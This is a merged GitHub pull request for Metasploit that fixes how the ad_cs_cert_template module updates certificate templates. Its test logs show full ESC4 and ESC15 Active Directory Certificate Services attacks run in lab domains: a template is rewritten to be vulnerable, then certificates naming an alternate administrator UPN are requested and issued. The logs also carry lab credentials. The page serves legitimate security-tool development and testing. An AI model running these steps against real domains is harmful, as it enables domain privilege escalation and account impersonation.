Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template #19572

Merged
merged 2 commits into from
Oct 22, 2024
Merged

Fix UPDATE certificate templates with admin/ldap/ad_cs_cert_template #19572

merged 2 commits into from
Oct 22, 2024
+11 −6

Conversation

cdelafuente-r7
Copy link
Contributor

This change introduced an issue with the admin/ldap/ad_cs_cert_template module when using the UPDATE action and the default templates. Removing the msPKI-Template-Schema-Version from the IGNORED_ATTRIBUTES array will result in deleting the attribute on the remote server. This is due to the fact that the default certificates templates used by the module don't include this attribute.

To fix this, I just added the msPKI-Template-Schema-Version attribute to certificate templates and set it to version 2.

Verify

Please, follow the steps in the Exploiting ESC4 To Gain Domain Administator Privileges section of the docs.

The installation procedure for ESC4 are in the following PR.

Before the fix (using the default ESC1 template)

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.232.98.2 username=msfuser password=123456 domain=my.domain.local CERT_TEMPLATE=ESC4
[*] Running module against 10.232.98.2

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=my,DC=domain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241018192601_default_10.232.98.2_windows.ad.cs.te_705926.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=mspro-dc-ad-pro-local-CA RHOSTS=10.232.98.2 username=msfuser password=123456 CERT_TEMPLATE=ESC4 [email protected]
[*] Running module against 10.232.98.2

[*] 10.232.98.2:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.232.98.2:445 - Binding to \cert...
[+] 10.232.98.2:445 - Bound to \cert
[*] 10.232.98.2:445 - Requesting a certificate for user msfuser - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC4
[-] 10.232.98.2:445 - There was an error while requesting the certificate.
[-] 10.232.98.2:445 - Denied by Policy Module  0x80094800, The request was for a certificate template that is not supported by the Active Directory Certificate Services policy: ESC4.
[-] 10.232.98.2:445 - Error details:
[-] 10.232.98.2:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 10.232.98.2:445 -   HRESULT: (0x80094800) CERTSRV_E_UNSUPPORTED_CERT_TYPE: The requested certificate template is not supported by this CA.
[*] Auxiliary module execution completed

After the fix (using the default ESC1 template)

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run verbose=true RHOSTS=10.232.98.2 username=msfuser password=123456 domain=my.domain.local CERT_TEMPLATE=ESC4
[*] Running module against 10.232.98.2

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] Read certificate template data for: CN=ESC4,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=my,DC=domain,DC=local
[*] Certificate template data written to: /home/n00tmeg/.msf4/loot/20241018192215_default_10.232.98.2_windows.ad.cs.te_706739.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > use admin/dcerpc/icpr_cert
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/dcerpc/icpr_cert) > run verbose=true CA=mspro-dc-ad-pro-local-CA RHOSTS=10.232.98.2 username=msfuser password=123456 CERT_TEMPLATE=ESC4 [email protected]
[*] Running module against 10.232.98.2

[*] 10.232.98.2:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 10.232.98.2:445 - Binding to \cert...
[+] 10.232.98.2:445 - Bound to \cert
[*] 10.232.98.2:445 - Requesting a certificate for user msfuser - alternate UPN: [email protected] - digest algorithm: SHA256 - template: ESC4
[+] 10.232.98.2:445 - The requested certificate was issued.
[*] 10.232.98.2:445 - Certificate UPN: [email protected]
[*] 10.232.98.2:445 - Certificate stored at: /home/n00tmeg/.msf4/loot/20241018192242_default_10.232.98.2_windows.ad.cs_492337.pfx
[*] Auxiliary module execution completed

Note that I tested with the other default templates (ESC2 and ESC3) and they still work as expected.

@cdelafuente-r7 cdelafuente-r7 added the rn-fix release notes fix label Oct 18, 2024
@smcintyre-r7 smcintyre-r7 self-assigned this Oct 18, 2024
smcintyre-r7
smcintyre-r7 requested changes Oct 18, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment
edited by adfoster-r7
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It looks like when msPKI-Template-Schema-Version is included in an UPDATE operation, the template becomes unusable. When msPKI-Template-Schema-Version is included in a CREATE operation and the value is 1 or 2, the template is created with a schema version of 1. I did not test other schema version values.

I think what we might actually want to do is:

  • revert the change that removed msPKI-Template-Schema-Version from the IGNORED_ATTRIBUTES array
  • remove the schema version from all of the templates (since they're created as version 1 anyways)
  • add the current version to the output of the READ operation (see the patch below)

Also if you don't mind, could you update the spots I missed to note the ESC15 support?

diff --git a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
index 0044830ecb..bfd67a8c8c 100644
--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -428,6 +428,11 @@ class MetasploitModule < Msf::Auxiliary
       print_status("  msPKI-RA-Signature: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
     end
 
+    pki_flag = obj['mkpki-template-schema-version']&.first
+    if pki_flag.present?
+      print_status("  msPKI-Template-Schema-Version: #{pki_flag}")
+    end
+
     if obj['mspki-certificate-policy'].present?
       if obj['mspki-certificate-policy'].length == 1
         if (oid_name = get_pki_oid_displayname(obj['mspki-certificate-policy'].first)).present?

@cdelafuente-r7
Copy link
Contributor Author

Thanks @smcintyre-r7, I've made these changes in the latest commit.

smcintyre-r7
smcintyre-r7 approved these changes Oct 22, 2024
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Alright I ran through this using the templates to both create and update the existing template to be vulnerable to ESC15 to see that it's working.

Testing Output ``` metasploit-framework.pr (S:0 J:0) > show options

Global Options:

Option Current Setting Description

ConsoleLogging false Log all console input and output
LogLevel 3 Verbosity of logs (default 0, max 3)
MeterpreterPrompt meterpreter The meterpreter prompt string
MinimumRank 0 The minimum rank of exploits that will run without explicit confirmation
Prompt metasploit-framework.pr (S:%S J:%J) The prompt string
PromptChar > The prompt character
PromptTimeFormat %H:%M:%S Format for timestamp escapes in prompts
SessionLogging false Log all input and output for sessions
SessionTlvLogging false Log all incoming and outgoing TLV packets
TimestampOutput false Prefix all console output with a timestamp

metasploit-framework.pr (S:0 J:0) > fzuse
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > show options

Module options (auxiliary/admin/ldap/ad_cs_cert_template):

Name Current Setting Required Description

BASE_DN no LDAP base DN if you already have it
CERT_TEMPLATE PR-19572 yes The remote certificate template name
SSL false no Enable SSL on the LDAP connection
TEMPLATE_FILE /home/smcintyre/Repositories/metasploit-framework/data/auxiliary/admin/ldap/ad_cs_cert_template/esc1_template.yaml no Local template definition file

Used when connecting via an existing SESSION:

Name Current Setting Required Description

SESSION no The session to run this module on

Used when making a new connection via RHOSTS:

Name Current Setting Required Description

DOMAIN msflab.local no The domain to authenticate to
PASSWORD Password1! no The password to authenticate with
RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 no The target port
USERNAME smcintyre no The username to authenticate with

Auxiliary action:

Name Description

READ Read the certificate template

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145221_default_192.168.159.10_windows.ad.cs.te_964934.json
[] Certificate Template:
[] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] displayName: PR-19572
[] objectGUID: f0f65d97-d4d4-4e3c-822f-09ca617945c5
[] msPKI-Certificate-Name-Flag: 0x00000001
[] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[] msPKI-Enrollment-Flag: 0x00000000
[] msPKI-Private-Key-Flag: 0x00000010
[] * CT_FLAG_EXPORTABLE_KEY
[] msPKI-RA-Signature: 0x00000000
[] pKIKeyUsage: 0x00000000
[] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > delete
[] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145226_default_192.168.159.10_windows.ad.cs.te_917580.json
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[-] Auxiliary aborted due to failure: not-found: The specified template was not found.
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > create
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[] Creating: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > read
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022145233_default_192.168.159.10_windows.ad.cs.te_420036.json
[] Certificate Template:
[] distinguishedName: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] displayName: PR-19572
[] objectGUID: 11b06edf-201e-4ade-8130-759c0a4f0f27
[] msPKI-Certificate-Name-Flag: 0x00000001
[] * CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
[] msPKI-Enrollment-Flag: 0x00000000
[] msPKI-Private-Key-Flag: 0x00000010
[] * CT_FLAG_EXPORTABLE_KEY
[] msPKI-RA-Signature: 0x00000000
[] msPKI-Template-Schema-Version: 1
[] pKIKeyUsage: 0x00000000
[] pKIMaxIssuingDepth: -1
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > use icpr_cert

Matching Modules

Name Disclosure Date Rank Check Description

0 auxiliary/admin/dcerpc/icpr_cert . normal No ICPR Certificate Management
1 _ AKA: Certifry . . . .
2 _ AKA: Certipy . . . .

Interact with a module by name or index. For example info 2, use 2 or use auxiliary/admin/dcerpc/icpr_cert

[] Using auxiliary/admin/dcerpc/icpr_cert
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options

Module options (auxiliary/admin/dcerpc/icpr_cert):

Name Current Setting Required Description

ADD_CERT_APP_POLICY 1.3.6.1.5.2.3.4 no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE ESC15-Test yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of

Used when connecting via an existing SESSION:

Name Current Setting Required Description

SESSION no The session to run this module on

Used when making a new connection via RHOSTS:

Name Current Setting Required Description

RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as

Auxiliary action:

Name Description

REQUEST_CERT Request a certificate

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE PR-19572
CERT_TEMPLATE => PR-19572
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY
Unsetting ADD_CERT_APP_POLICY...
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > show options

Module options (auxiliary/admin/dcerpc/icpr_cert):

Name Current Setting Required Description

ADD_CERT_APP_POLICY no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN [email protected] no Alternative certificate UPN (format: USER@DOMAIN)
CA msflab-DC-CA yes The target certificate authority
CERT_TEMPLATE PR-19572 yes The certificate template
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of

Used when connecting via an existing SESSION:

Name Current Setting Required Description

SESSION no The session to run this module on

Used when making a new connection via RHOSTS:

Name Current Setting Required Description

RHOSTS 192.168.159.10 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBUser mhatter no The username to authenticate as

Auxiliary action:

Name Description

REQUEST_CERT Request a certificate

View the full module info with the info, or info -d command.

metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[] 192.168.159.10:445 - Certificate UPN: [email protected]
[] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022145314_default_192.168.159.10_windows.ad.cs_866614.pfx
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > previous
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150133_default_192.168.159.10_windows.ad.cs.te_142919.json
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > update
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[] Discovering base DN automatically
[+] Read certificate template data for: CN=PR-19572,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local
[] Certificate template data written to: /home/smcintyre/.msf4/loot/20241022150134_default_192.168.159.10_windows.ad.cs.te_145328.json
[] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/ldap/ad_cs_cert_template) > previous
[] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) > run
[] Running module against 192.168.159.10

[] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[] 192.168.159.10:445 - Requesting a certificate for user mhatter - alternate UPN: [email protected] - digest algorithm: SHA256 - template: PR-19572
[+] 192.168.159.10:445 - The requested certificate was issued.
[] 192.168.159.10:445 - Certificate UPN: [email protected]
[] 192.168.159.10:445 - Certificate Policies:
[] 192.168.159.10:445 - * 1.3.6.1.5.2.3.4
[] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20241022150140_default_192.168.159.10_windows.ad.cs_878467.pfx
[] Auxiliary module execution completed
metasploit-framework.pr (S:0 J:0) auxiliary(admin/dcerpc/icpr_cert) >

</details>

@smcintyre-r7 smcintyre-r7 merged commit 05a149d into rapid7:master Oct 22, 2024
39 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
rn-fix release notes fix
Projects
Metasploit Kanban
Status: Done
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@cdelafuente-r7 @smcintyre-r7